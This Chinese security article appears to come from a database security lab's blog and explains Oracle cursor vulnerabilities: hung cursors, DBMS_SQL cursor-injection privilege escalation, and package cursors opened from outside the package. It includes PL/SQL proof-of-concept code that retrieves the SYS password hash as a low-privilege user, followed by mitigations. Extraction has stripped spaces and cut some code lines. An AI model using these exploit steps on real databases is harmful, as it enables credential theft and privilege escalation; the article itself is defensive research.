Oracle数据库游标中的安全隐患及防护建议

©2016是面向集合的语言，其结果一般是集合量（含多条记录），而pl/sql的变量是标量，一组变量一次只能存放一条记录。很多时候查询结果的记录数是不确定的，无法提前声明足够的变量。于是引入了游标的概念，游标使得数据库操作更灵活，但同时也给黑客入侵数据库带来了机会。安华金和数据库安全实验室（DBSecLabs）基于游标的应用原理，本文讨论游标可能带来什么安全隐患以及如何应对这些安全隐患。二.游标的分类oracle数据库游标是Pl/sql执行DQL、DML等语句的时候，oracle在内存中为其结果集分配一个缓冲区。游标是指向该区的一个指针、命名一个工作区或是一种结构化数据类型。它为应用程序提供了一种对结果集中每一行数据单独处理的方法。oracle游标基本可以分为以下3类：显式游标、隐式游标和动态游标（关系具体看下图）。©2016游标的核心功能在于，从表中检索出结果集，每次指向一条记录，与客户端或应用程序进行交互，因此游标是设计嵌入式SQL语句的应用程序的常用编程方式。随着游标的广泛使用，其本身的安全隐患也变得越来越突出。三.游标带来的安全隐患oracle游标给数据库带来的安全隐患主要分为三大类：3.1缺乏异常处理，挂起的游标被恶意利用游标将数据库中相应的信息存入内存块中，当用户打开游标的时候，可以直接访问游标指向的内存块中存放的信息，而无需再访问基表获得数据。如果一个高权限用户建立一个游标却没关闭该游标，低权限用户就有可能获得游标中存储的关键信息，或向打开的游标中注入恶意语句，进行高权限运行，达到提权或越权访问的目的。这就是游标SNARF提权的基础。游标不正常关闭基本是人为造成的，高权限用户忘记关闭，或者游标所在的子程序缺乏异常处理机制。如果没有做相应的异常处理，黑客很有可能制造异常，使游标被一直挂起，利用未关闭的游标，注入恶意代码。再利用游标自身的高权限执行恶意代码，进行越权或者非法提权操作。下面试验用例由安华金和数据库安全实验室提供：SQLconnect/assysdba已连接。SQLCREATEORREPLACEPROCEDUREschina_test(P_USERVARCHAR)IS2CURSOR_NAMEINTEGER;3PASSWORDVARCHAR2(30);4IINTEGER;5BEGIN6CURSOR_NAME:=DBMS_SQL.OPEN_CURSOR;7DBMS_OUTPUT.PUT_LINE('CURSOR:'||CURSOR_NAME);8DBMS_SQL.PARSE(CURSOR_NAME,'SELECTPASSWORDFROM9SYS.DBA_USERSWHEREUSERNAME=:schina',dbms_sql.native);©2016(CURSOR_NAME,:schina',P_USER);11DBMS_SQL.DEFINE_COLUMN(CURSOR_NAME,1,PASSWORD,30)；12I:=DBMS_SQL.EXECUTE(CURSOR_NAME)；13IFPASSWORD='01234567890ABCDEF'THEN14DBMS_OUTPUT.PUT_LINE('YOURPASSWORDHASHISNOTOK');15ELSE16DBMS_OUTPUT.PUT_LINE('YOURPASSWORDHASHISOK');17ENDIF;18DBMS_SQL.CLOSE_CURSOR(CURSOR_NAME);19END;20/PL/SQL过程已成功完成。SQLgrantexecuteonschina_testtopublic;授权成功。schina_test是一个缺乏异常处理代码的存储过程，它的作用是对给定用户找到其密码hash值，然后和固定HASH值进行比较并返回结果。open_cursor打开游标直到close_cursor或SQL会话终止游标退出。由于缺乏异常代码机制，用任意低权限账号执行这个存储过程，可以触发异常挂起游标。SQLconnectscott/tiger已连接。SQLsetserveroutputonSQLdeclare2xvarchar(40000);3iinteger;4begin5froiin1..10000loop6x:='b'||x;7endloop;8sys.schina_test(x);9end;©2016通过向p_user中输入一个过长的x，系统返回ORA-01460错误。由于存储过程schina_test中没有对异常进行处理，虽然存储过程中关闭游标了，但由于发生异常，导致游标被挂起，同时并未真正关闭。可以对未关闭的游标注入恶意语句，以达到所需要的效果。3.2oracle游标漏洞提权游标提权漏洞就是在上面的基础上利用被挂起的游标，通过类似DBMS_SQL这种由系统定义的包，把游标语句和高权限用户进行绑定。接着上面的例子通过DBMS_SQL绑定SYS，用户直接获取SYS的密码HASH。SQLDECLARE2CURSOR_NAMEINTEGER;3IINTEGER;4PWDVARCHAR2(30);5BEGIN6CURSOR_NAME:=3241423;7DBMS_SQL.BIND_VARIABLE(CURSOR_NAME,':schina','SYS')；8DBMS_SQL.DEFINE_COLUMN(CURSOR_NAME,1,PWD,30)；9I:=DBMS_SQL.EXECUTE(CURSOR_NAME)；10IFDBMS_SQL.FETCH_ROWS(CURSOR_NAME)0THEN11DBMS_SQL.COLUMN_VALUE(CURSOR_NAME,1,PWD);12ENDIF;13DBMS_SQL.CLOSE_CURSOR(CURSOR_NAME)；14DBMS_OUTPUT.PUT_LINE('PWD:'||PWD);15END；16/上述代码是在获取游标值的前提下进行的，因此在代码声明的地方写入游标值3241423。使用DBMS_SQL中的BIND_VARIABLE(cursor_name,':schina',sys)将游标和SYS用户绑定。这样执行查询SYS用户。后台数据库真正运行的语句是：selectpasswordfromsys.dba_userswhereusername='sys'。DBMS_SQl.define_column函数的作用是将游标中第一列的值返回©2016变量。黑客在执行完上述匿名块后，系统结果返回SYS密码的HASH散列，使用HASH逆向工具进行转换就可以获得SYS密码明文，直接夺取数据库最高权限。3.3oracle游标设计本身的安全隐患其实通过游标获取高权限账号的密码完全不用这么麻烦，oracle在游标设计上本身就有安全问题。用高权限用户写一个包，这个包中放入一个游标，功能和前面用的schina_test是一致的。用来取回需要检查账号的hash。然后和我们给出的一组预设hash做对比。低权限用户如果知道这个游标可以直接在包外调用该游标，从而获取游标中的内容。包内游标可以在包外被调用，这是oracle游标本身设计上的安全缺陷。SQLconnect/assysdba已连接。SQLCREATEORREPLACEPACKAGEschinaAS2CURSORX(USERNAMEINVARCHAR2)ISSELECTPASSWORDFROMSYS.USER$3WHERENAME=USERNAME;4PROCEDURECHECK_PASSWORD;5END;6/程序包已创建。SQLCREATEORREPLACEPACKAGEBODYschinaAS2PROCEDURECHECK_PASSWORDIS3PASSWORDVARCHAR2(200);4BEGIN5OPENX(USER());6FETCHXINTOPASSWORD;7CLOSEX;8IFPASSWORD='01234567890ABCDEF'THEN©2016('YOURPASSWORDHASHISNOTOK');10ELSE11DBMS_OUTPUT.PUT_LINE('YOURPASSWORDHASHISOK');12ENDIF;13ENDCHECK_PASSWORD;14END;15/程序包体已创建。SQLshowerrors没有错误。SQLGRANTEXECUTEONSYS.SCHINATOPUBLIC;授权成功。通过showerrors检验发现整个过程没有X游标挂起的问题。X游标正常关闭了，到现在为止操作一切正常切换到低权限账号SQLconnectscott/tiger已连接。SQLsetserveroutputonSQLexecsys.schina.check_password;YOURPASSWORDHASHISOK执行包返回的结果很安全，不会显示出游标内存储的内容，但如果通过一个匿名块，在包外使用游标的结果就变得不安全了，低权限用户可以轻易使用高权限用户设置的游标。通过游标直接可以获取到游标中存储的结果集。SQLDECLAREPASSWORDVARCHAR2(200);2BEGINOPENSYS.SCHINA.X('SYS');3FETCHSYS.SCHINA.XINTOPASSWORD;©2016('TheSYSpasswordis'||PASSWORD);6END;7/TheSYSpasswordisCF10653F66A74AC2任何权限账号的密码通过这种方式都会被低权限用户直接获取HASH值，然后通过HASH逆向工具，获取全部账号的密码。四.解决办法根据上一节游标的安全隐患，我们摸清了游标安全隐患的成因。本章讲叙述如何防范这些安全隐患。4.1防游标被恶意挂起1)单纯的规范输入验证过程，绑定变量已经不能满足游标日益严峻的安全隐患威胁。应当对用户可输入参数的变量的长度做更严格的限制，来防止触发异常。最基本办法是按照用户输入参数的正常值的长度来进行限制，在用户输入参数后，先对参数进行长度校验。如果超过默认长度，直接抛弃该次输入，这样可以在一定程度上减少异常发生的概率。2)始终保持子程序中，有专门对付异常的异常处理机制。防止恶意输入，导致游标被挂起。当异常发生的时候，保证会把游标关闭。4.2防游标漏洞提权在前面提到的利用游标进行提权的技术核心是利用DBMS_SQL包中的一些带有varchar参数的函数，尤其是DBMS_sql.parse函数是完成游标注入类攻击。攻击者正是通过这个函数完成将恶意代码注入到函数中，并将恶意代码与游标绑定。于是最直接的想法是通过撤销DBMS_SQL的PUBLIC权限来限制低权限用户对DBMS_SQL的利用。但整个oracle中至少有170个对象依赖于DBMS_SQL。如果撤销DBMS_SQL的公共权限，将会造成很多操作上的麻烦。虽然DBMS_SQL提供了注入的土壤，©2016对数据库进行恶意攻击。限制DDL语句有3种方式：1）通过权限进行控制。2）通过BEFORE型的安全触发器进行控制。3）通过防火墙进行控制。安华金和数据库安全专家经过很多测试分析发现，当用户量少的时候DBA可以对每个用户进行逐个权限设置，但如果用户量大，逐个权限设置既不现实也不准确。这时推荐采用数据库防火墙和BEFOR